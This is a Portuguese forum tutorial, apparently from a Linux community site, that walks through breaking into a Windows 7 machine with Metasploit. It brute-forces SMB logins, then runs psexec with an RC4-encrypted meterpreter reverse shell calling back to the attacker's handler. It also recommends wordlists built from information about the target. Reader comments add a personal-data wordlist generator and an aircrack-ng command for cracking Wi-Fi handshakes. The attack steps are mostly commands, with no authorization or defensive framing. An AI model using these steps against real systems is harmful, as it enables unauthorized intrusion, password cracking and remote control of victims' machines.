Metaspoit: Brute force + invasão com meterpreter encriptado com RC4

O que é Metasploit Framework? Metasploit Framework é uma ferramenta de código aberto, voltada para o desenvolvimento e lançamento de exploits. Neste artigo, vou demonstrar o uso de 2 módulos desta ferramenta, com o objetivo de comprometer um computador remoto rodando Windows 7.

[ Hits: 15.615 ]

Por: Perfil removido em 29/08/2014


Preview do alvo e do atacante e execução do módulo de brute force



Saudações, galera.

Resolvi fazer um artigo mostrando um pouco sobre brute force com Metasploit, no caso, no SMB do Windows 7 que muitos ainda têm um certo trabalho, pois não existe um equivalente, digamos assim, de um ms08_067_netapi pro Windows 7 kk. Por isso, vamos fazer uma invasão direta do Windows 7.

Primeiramente, obtendo as credenciais de login por brute force e, posteriormente, vamos executar o modulo psxec, juntamente com o payload meterpreter encriptado em RC4. Vamos lá, então.

Temos aqui nossos "garotos", Kali Linux e Windows 7:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4   Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Seguindo então, vamos usar esse módulo auxiliar:

> use auxiliary/scanner/smb/smb_login

As opções:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

> set pass_file [caminho] # Aqui informaremos o local onde está a wordlist com as senhas a serem usadas.
> set rhosts [IPs] # Aqui vamos informar nossos alvos, ou alvo no caso, rs.
> set threads [N] # Aqui o número de threads, caso prefira pode deixar default também.
> set user_file [caminho] # Aqui informaremos o caminho da wordlist com os nomes de usuários.
> set user_as_pass [false/true] # Caso essa opção esteja habilitada (true) o nome de scan vai tentar usar o nome de usuário como senha também, tipo "admin:admin".

E agora, vamos rodar nosso scan:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Execução do módulo 2

Execução do módulo 2 com as credenciais obtidas anteriormente

Certo, aqui para testes, coloquei uma senha fácil, uma wordlist pequena, mas na prática, vai ser um pouco mais complicado.

* Uma dica: fuja de wordlists baixadas na internet, uma wordlist (principalmente de senhas) deve ser feita com base em informações coletadas do alvo.

Voltando aqui, obtemos a credencial administrador:12345, e agora já temos o que é preciso para executar o próximo módulo, o que nos dará acesso ao sistema.

Seguindo..

> use exploit/windows/smb/psexec
> set payload windows/meterpreter/reverse_tcp_rc4
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

E vamos configurar o módulo:

> set rhost [IP] # Aqui colocamos o IP do alvo.
> set smbuser [usuario] # Aqui vai o nome de usuário que obtivemos anteriormente, lembram?
> set smbpass [senha] # Aqui a senha do usuário que obtivemos anteriormente.
> set lhost [ip] # Aqui vamos colocar o IP de onde estará o nosso handler, esperando a conexão.
> set rc4password [string] # Aqui vamos escolher a chave do nosso RC4.
> set lport [N] # Aqui vai a porta onde o handler vai esperar a conexão.
> getuid # Pra sabermos qual nosso usuário atual dentro do sistema.
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Conclusão

Bom, é isso.
É uma execução que pode ser bastante útil.

Fonte:
   

Páginas do artigo
   1. Preview do alvo e do atacante e execução do módulo de brute force
Outros artigos deste autor

Configuração do serviço NTP em servidor cliente

Gerenciamento centralizado de usuários de rede com GOSA

Sudoers 1.8.12 - Parte I - Manual

Compilando e otimizando KDE 3.x

Tunando sistemas de arquivos para GNU/Linux

Leitura recomendada

Portal de autenticação wireless (HotSpot)

Enviando e recebendo e-mails criptografados através do Thunderbird

Security Hacks: Linux & BSD

Criptografia com Loop-AES

Seu maior inimigo é você mesmo!

  
Comentários
[1] Comentário enviado por removido em 29/08/2014 - 12:55h

Valeu ta favoritado!

[2] Comentário enviado por zerotres em 04/09/2014 - 18:35h

Falando em wordlist, eu fiz um pequeno programa em C capaz de gerar senhas realmente funcionais de acordo com dados obtidos e um pouco de criatividade. Pelo menos pra mim ele funciona até melhor que o crunch, cujo 90% das senhas geradas não servem pra nada >.<
O nome é wlmaker e pode ser obtido por meio desse link: http://sourceforge.net/projects/wlmaker/
(deixem um feedback por favor e eu prometo lançar novas versões)

Como funciona:
1. $ echo renan novaes @ > wordlist.tmp
2. $ ./wlmaker wordlist.tmp > wordlist.lst
Resultando num arquivo com as seguintes palavras:
renan
renanrenan
renannovaes
renan@
novaes
novaesrenan
novaesnovaes
novaes@
@
@renan
@novaes
@@
-------------------------------------------------------------------------------------------------
Parece inofensivo no exemplo acima, mas com um dicionário, vc pode formar verdadeiras frases.
No comando echo, fica interessante adicionar 123 1234 abc admin Admin... O nome da pessoa, sobrenome, nome de parentes, ou até datas... Um grep também pode ajudar a filtrar melhor os resultados ;)

COMPILAR É SIMPLES
gcc wlmaker.c -o wlmaker

[3] Comentário enviado por removido em 08/09/2014 - 19:42h

interessante sua ferramenta, vou dar uma testada nela

abç

[4] Comentário enviado por zerotres em 08/09/2014 - 20:14h

Deixa um comentário pra eu saber se o projeto vale a pena!
Obrigado

Ah! Ele funciona com o aircrack

./wlmaker wordlist.lst | aircrack-ng --bssid xx:xx:xx:xx:xx:xx arq.cap -w-


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts